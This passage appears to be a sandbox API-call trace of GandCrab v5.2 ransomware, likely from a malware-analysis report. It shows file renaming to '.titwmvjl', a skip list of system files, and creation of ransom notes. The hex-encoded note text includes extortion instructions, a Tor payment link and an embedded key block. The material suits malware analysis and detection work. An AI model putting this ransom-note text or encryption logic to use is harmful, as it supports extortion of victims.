(lpString=".titwmvjl") returned 9 [0096.323] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\TITWMVJL-DECRYPT.txt") returned 45 [0096.325] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.325] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Desktop\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 54 [0096.325] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\TITWMVJL-DECRYPT.txt") returned 45 [0096.325] lstrlenW (lpString=".txt") returned 4 [0096.325] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.326] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.326] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.326] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.326] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\TITWMVJL-DECRYPT.txt") returned 45 [0096.326] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\TITWMVJL-DECRYPT.txt") returned 45 [0096.326] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.326] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.326] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.326] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.326] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.326] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.326] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.326] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.326] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.326] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.326] FindClose (in: hFindFile=0x5033f8 | out: hFindFile=0x5033f8) returned 1 [0096.327] CloseHandle (hObject=0x230) returned 1 [0096.327] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.327] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0096.327] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0096.327] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0096.327] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0096.327] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.328] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.328] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.328] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.328] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.328] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.328] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.328] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.328] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.328] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.329] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.329] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Documents\\\\TITWMVJL-DECRYPT.txt") returned 48 [0096.329] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\documents\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.332] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x4